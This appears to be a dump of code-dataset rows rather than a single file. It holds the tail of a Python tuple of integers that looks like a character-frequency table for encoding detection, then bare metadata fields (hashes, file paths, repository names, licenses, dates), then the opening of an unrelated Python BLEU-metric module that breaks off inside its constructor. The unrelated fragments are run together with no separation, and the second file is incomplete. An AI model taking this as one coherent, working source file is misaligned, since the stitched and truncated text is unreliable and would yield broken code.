5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376
)
| 83.663014
| 245
| 0.732816
|
4a143edef8ba6fc2a337d991bf11cd3a6e621e50
| 4,014
|
py
|
Python
|
metrics/bleu.py
|
songyouwei/TextGAN-PyTorch
|
6233ed5d22c1744b5a9890d89a16b60159a883e2
|
[
"MIT"
] | 1
|
2020-11-25T07:38:26.000Z
|
2020-11-25T07:38:26.000Z
|
metrics/bleu.py
|
songyouwei/TextGAN-PyTorch
|
6233ed5d22c1744b5a9890d89a16b60159a883e2
|
[
"MIT"
] | null | null | null |
metrics/bleu.py
|
songyouwei/TextGAN-PyTorch
|
6233ed5d22c1744b5a9890d89a16b60159a883e2
|
[
"MIT"
] | 1
|
2020-10-02T11:15:04.000Z
|
2020-10-02T11:15:04.000Z
|
# -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : bleu.py
# @Time : Created at 2019-05-31
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
from multiprocessing import Pool
import nltk
import os
import random
from nltk.translate.bleu_score import SmoothingFunction
from metrics.basic import Metrics
class BLEU(Metrics):
def __init__(self, test_text=None, real_text=None, gram=3, portion=1):
if type(gram) == int:
super(BLEU, self).__init__('BLEU-%d' % gram)
elif type(gram) == list:
super(BLEU, self).__init__('BLEU-%s' % gram)
else:
